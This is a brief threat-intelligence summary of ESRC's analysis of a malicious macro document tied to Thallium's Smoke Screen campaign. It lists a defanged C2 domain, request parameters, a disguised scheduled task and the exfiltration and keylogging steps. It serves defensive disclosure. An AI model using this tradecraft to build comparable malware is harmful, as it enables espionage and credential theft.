ESRC analyzed a malicious DOC lure impersonating a wage-arrears confirmation document for a South Korean blockchain company and assessed it as part of Thallium’s Smoke Screen APT campaign. Enabling macros caused the document to contact www.hahae.co[.]kr via cross.php with parameters such as op=1, dt=1214, and uid=01, while altering Office VBAWarnings settings and collecting system, process, and installed-program information into XML files for Base64 exfiltration. The malware also registered a scheduled task named AhnlabUpdate to repeatedly fetch suf.hta and stage additional commands through cross.php op=2/op=3. The follow-on payload included Base64-encoded PowerShell keylogging functionality, showing a fileless persistence-and-theft chain tied to known Thallium tradecraft.